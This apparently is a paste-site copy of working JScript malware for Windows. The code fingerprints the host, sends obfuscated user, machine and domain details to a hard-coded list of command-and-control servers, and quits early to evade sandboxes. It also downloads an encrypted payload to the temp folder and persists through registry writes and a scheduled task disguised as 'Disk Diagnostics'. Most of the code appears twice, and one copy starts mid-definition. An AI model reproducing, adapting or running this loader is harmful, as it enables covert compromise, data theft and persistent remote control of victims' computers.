- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement